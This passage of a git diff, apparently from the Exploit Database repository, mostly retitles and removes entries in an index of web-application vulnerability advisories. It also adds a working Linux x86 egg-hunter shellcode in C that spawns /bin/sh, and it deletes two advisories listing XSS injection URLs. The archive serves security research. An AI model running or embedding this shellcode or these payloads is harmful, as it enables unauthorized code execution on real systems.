SQL Injection",2009-07-21,Moudi,php,webapps,0 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0 9231,platforms/php/webapps/9231.txt,"Phorum 5.2.11 - Permanent Cross-Site Scripting",2009-07-22,Crashfr,php,webapps,0 9235,platforms/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 - readfile() Local File Disclosure",2009-07-23,NoGe,php,webapps,0 @@ -21408,7 +21409,7 @@ id,file,description,date,author,platform,type,port 9525,platforms/php/webapps/9525.txt,"Moa Gallery 1.2.0 - (p_filename) Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0 9527,platforms/php/webapps/9527.txt,"Simple CMS Framework 1.0 - 'page' Parameter SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0 9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star 2.0 - (fmid) SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0 -9530,platforms/php/webapps/9530.txt,"open auto Classifieds 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0 +9530,platforms/php/webapps/9530.txt,"Open Auto Classifieds 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0 9531,platforms/php/webapps/9531.txt,"PAD Site Scripts 3.6 - (list.php string) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 9532,platforms/php/webapps/9532.txt,"allomani 2007 - (cat) SQL Injection",2009-08-26,"NeX HaCkEr",php,webapps,0 9533,platforms/php/webapps/9533.txt,"PHPSANE 0.5.0 - (save.php) Remote File Inclusion",2009-08-26,CoBRa_21,php,webapps,0 @@ -21864,7 +21865,7 @@ id,file,description,date,author,platform,type,port 10592,platforms/php/webapps/10592.txt,"PHPOPENCHAT 3.0.2 - Cross-Site Scripting AND/OR FPD",2009-12-21,Dedalo,php,webapps,0 10594,platforms/php/webapps/10594.txt,"The Uploader 2.0 - Arbitrary File Upload",2009-12-22,"Master Mind",php,webapps,0 10597,platforms/php/webapps/10597.txt,"Active PHP BookMarks 1.3 - SQL Injection",2009-12-22,Mr.Elgaarh,php,webapps,0 -10598,platforms/php/webapps/10598.txt,"deluxebb 1.3 - Multiple Vulnerabilities",2009-12-22,cp77fk4r,php,webapps,0 +10598,platforms/php/webapps/10598.txt,"DeluxeBB 1.3 - Multiple Vulnerabilities",2009-12-22,cp77fk4r,php,webapps,0 10599,platforms/php/webapps/10599.txt,"The Uploader 2.0 - File Disclosure",2009-12-22,Stack,php,webapps,0 10600,platforms/php/webapps/10600.txt,"mypage 0.4 - Local File Inclusion",2009-12-22,BAYBORA,php,webapps,0 10601,platforms/php/webapps/10601.txt,"Mini File Host 1.5 - Arbitrary File Upload",2009-12-22,MR.Z,php,webapps,0 @@ -28026,11 +28027,11 @@ id,file,description,date,author,platform,type,port 26261,platforms/php/webapps/26261.txt,"Noah's Classifieds 1.3 - 'index.php' Cross-Site Scripting",2005-09-14,trueend5,php,webapps,0 26262,platforms/php/webapps/26262.txt,"Digital Scribe 1.4 - Login SQL Injection",2005-09-15,rgod,php,webapps,0 26263,platforms/php/webapps/26263.txt,"AEwebworks aeDating 3.2/4.0 - search_result.php SQL Injection",2005-09-15,alexsrb,php,webapps,0 -26264,platforms/php/webapps/26264.txt,"DeluxeBB 1.0 - topic.php tid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 -26265,platforms/php/webapps/26265.txt,"DeluxeBB 1.0 - misc.php uid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 -26266,platforms/php/webapps/26266.txt,"DeluxeBB 1.0 - forums.php fid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 -26267,platforms/php/webapps/26267.txt,"DeluxeBB 1.0 - pm.php uid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 -26268,platforms/php/webapps/26268.txt,"DeluxeBB 1.0 - newpost.php fid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 +26264,platforms/php/webapps/26264.txt,"DeluxeBB 1.0 - 'topic.php' SQL Injection",2005-09-15,abducter,php,webapps,0 +26265,platforms/php/webapps/26265.txt,"DeluxeBB 1.0 - 'misc.php' SQL Injection",2005-09-15,abducter,php,webapps,0 +26266,platforms/php/webapps/26266.txt,"DeluxeBB 1.0 - 'forums.php' SQL Injection",2005-09-15,abducter,php,webapps,0 +26267,platforms/php/webapps/26267.txt,"DeluxeBB 1.0 - 'pm.php' SQL Injection",2005-09-15,abducter,php,webapps,0 +26268,platforms/php/webapps/26268.txt,"DeluxeBB 1.0 - 'newpost.php' SQL Injection",2005-09-15,abducter,php,webapps,0 26333,platforms/asp/webapps/26333.html,"Aenovo - /Password/default.asp Password Field SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 26334,platforms/asp/webapps/26334.txt,"Aenovo - /incs/searchdisplay.asp strSQL Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 26270,platforms/php/webapps/26270.txt,"Content2Web 1.0.1 - Multiple Input Validation Vulnerabilities",2005-09-16,"Security Tester",php,webapps,0 @@ -28419,10 +28420,10 @@ id,file,description,date,author,platform,type,port 26772,platforms/cfm/webapps/26772.txt,"Magic Book Professional 2.0 - Book.cfm Cross-Site Scripting",2005-12-12,r0t,cfm,webapps,0 26777,platforms/asp/webapps/26777.txt,"LocazoList Classifieds 1.0 - SearchDB.asp Input Validation",2005-12-12,r0t3d3Vil,asp,webapps,0 26778,platforms/jsp/webapps/26778.txt,"BlackBoard Academic Suite 6.2.3.23 - Frameset.jsp Cross-Domain Frameset Loading",2005-12-12,dr_insane,jsp,webapps,0 -26780,platforms/php/webapps/26780.txt,"Scout Portal Toolkit 1.3.1 - SPT-QuickSearch.php Multiple Parameter Cross-Site Scripting",2005-12-12,Preddy,php,webapps,0 -26781,platforms/php/webapps/26781.txt,"Scout Portal Toolkit 1.3.1 - SPT-BrowseResources.php ParentId Parameter Cross-Site Scripting",2005-12-12,Preddy,php,webapps,0 -26782,platforms/php/webapps/26782.txt,"Scout Portal Toolkit 1.3.1 - SPT-AdvancedSearch.php Multiple Parameter Cross-Site Scripting",2005-12-12,Preddy,php,webapps,0 -26783,platforms/php/webapps/26783.txt,"Scout Portal Toolkit 1.3.1 - SPT-UserLogin.php Multiple Parameter SQL Injection",2005-12-12,Preddy,php,webapps,0 +26780,platforms/php/webapps/26780.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-QuickSearch.php' Cross-Site Scripting",2005-12-12,Preddy,php,webapps,0 +26781,platforms/php/webapps/26781.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-BrowseResources.php' Cross-Site Scripting",2005-12-12,Preddy,php,webapps,0 +26782,platforms/php/webapps/26782.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-AdvancedSearch.php' Cross-Site Scripting",2005-12-12,Preddy,php,webapps,0 +26783,platforms/php/webapps/26783.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-UserLogin.php' SQL Injection",2005-12-12,Preddy,php,webapps,0 26784,platforms/php/webapps/26784.txt,"BTGrup Admin WebController - SQL Injection",2005-12-12,khc@bsdmail.org,php,webapps,0 26785,platforms/php/webapps/26785.txt,"Arab Portal 2.0 - Link.php SQL Injection",2005-12-12,stranger-killer,php,webapps,0 26786,platforms/cgi/webapps/26786.txt,"EveryAuction 1.53 - Auction.pl Cross-Site Scripting",2005-12-13,$um$id,cgi,webapps,0 @@ -29430,7 +29431,6 @@ id,file,description,date,author,platform,type,port 28120,platforms/php/webapps/28120.txt,"vCard PRO - rating.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28121,platforms/php/webapps/28121.txt,"vCard PRO - create.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28122,platforms/php/webapps/28122.txt,"vCard PRO - search.php event_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 -28123,platforms/php/webapps/28123.txt,"Pre Shopping Mall 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 - 'index.php' Directory Traversal",2006-06-28,rUnViRuS,php,webapps,0 28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info - Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php value Parameter' SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 @@ -29858,7 +29858,7 @@ id,file,description,date,author,platform,type,port 28721,platforms/php/webapps/28721.txt,"Red Mombin 0.7 - 'index.php' Unspecified Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps,0 28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 - process_login.php Unspecified Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps,0 28723,platforms/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,php,webapps,80 -28736,platforms/php/webapps/28736.txt,"DeluxeBB 1.09 - Sig.php Remote File Inclusion",2006-10-02,r0ut3r,php,webapps,0 +28736,platforms/php/webapps/28736.txt,"DeluxeBB 1.09 - 'Sig.php' Remote File Inclusion",2006-10-02,r0ut3r,php,webapps,0 28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner - functions.php Remote File Inclusion",2006-10-02,"abu ahmed",php,webapps,0 28738,platforms/php/webapps/28738.txt,"Digishop 4.0 - cart.php Cross-Site Scripting",2006-10-02,meto5757,php,webapps,0 28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 - template.php Script Code Injection",2006-10-03,"James Bercegay",php,webapps,0 @@ -33128,7 +33128,6 @@ id,file,description,date,author,platform,type,port 34043,platforms/php/webapps/34043.txt,"360 Web Manager 3.0 - 'webpages-form-led-edit.php' SQL Injection",2010-05-24,"High-Tech Bridge SA",php,webapps,0 34044,platforms/php/webapps/34044.txt,"md5 Encryption Decryption PHP Script - 'index.php' Cross-Site Scripting",2010-05-26,indoushka,php,webapps,0 34045,platforms/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' Parameter SQL Injection",2010-05-27,"sniper ip",php,webapps,0 -34046,platforms/php/webapps/34046.txt,"BackLinkSpider 1.3.1774 - Multiple Cross-Site Scripting Vulnerabilities",2010-05-27,"sniper ip",php,webapps,0 34049,platforms/php/webapps/34049.txt,"Layout CMS 1.0 - SQL Injection / Cross-Site Scripting",2010-01-12,Red-D3v1L,php,webapps,0 34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats AddOn - 'Accept-Language' Header SQL Injection",2010-05-28,"Christopher Schramm",php,webapps,0 34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection",2010-05-28,"High-Tech Bridge SA",php,webapps,0 diff --git a/platforms/lin_x86/shellcode/40827.c b/platforms/lin_x86/shellcode/40827.c new file mode 100755 index 000000000..3692ee9f1 --- /dev/null +++ b/platforms/lin_x86/shellcode/40827.c @@ -0,0 +1,45 @@ +/* +;author: Filippo "zinzloun" Bersani +;date: 25/11/2016 +;version 1.0 +;purpose: different approach with fnstenv technique, changed the usual pattern to find the egg mark +;X86 Assembly/NASM Syntax +;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit +; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit + + +global _start +section .text +_start: + + fldz ;with this 2 instructions... + fnstenv [esp-0xc] ;set the entry point of my egg (_start) + + pop esi ;get the entry point addr... + lea esi,[esi+24] ;the trick: move to pointer @ the last byte of this egg hunter + + mov edx, dword 0x65676760 ;a dumm value.. + rol edx, 0x4 ;...to get the real egg mark: 56767606 + +find_egg: + inc esi ;scan the next section of memory after this code + cmp [esi], edx ;check if we have found the egg... + jz find_egg ;loop + call esi ;egg found (zero flag is set), jump to the address to exec the shell code + */ + +#include +#include + +unsigned char egg_hunter[] = \ +"\xd9\xee\xd9\x74\x24\xf4\x5e\x8d\x76\x18\xba\x60\x67\x67\x65\xc1\xc2\x04\x46\x39\x16\x74\xfb\xff\xd6"; +unsigned char shell_code[] = \ +"\x06\x76\x76\x56" // egg id reversed +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // POC: /bin/bash +main() +{ + printf("Egg hunter length: %d\n", strlen(egg_hunter)); + printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code)); + int (*ret)() = (int(*)())egg_hunter; + ret(); +} diff --git a/platforms/php/webapps/28123.txt b/platforms/php/webapps/28123.txt deleted file mode 100755 index 541a5a4c0..000000000 --- a/platforms/php/webapps/28123.txt +++ /dev/null @@ -1,8 +0,0 @@ -source: http://www.securityfocus.com/bid/18706/info - -Pre Shopping Mall is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. - -An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks. - -http://www.example.com/emall/products.php?cid=[XSS] -http://www.example.com/emall/detail.php?prodid=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34046.txt b/platforms/php/webapps/34046.txt deleted file mode 100755 index 61229f263..000000000 --- a/platforms/php/webapps/34046.txt +++ /dev/null @@ -1,12 +0,0 @@ -source: http://www.securityfocus.com/bid/40400/info - -BackLinkSpider is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. - -An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - -BackLinkSpider 1.3.1774.0 is vulnerable; other versions may also be affected. - - -http://www.example.com/links.php?cat_id=[XSS] -http://www.example.com/links.php?siteid=[XSS] -http://www.example.com/links.php?cat_id=1&cat_name=1[XSS] \ No newline at end of file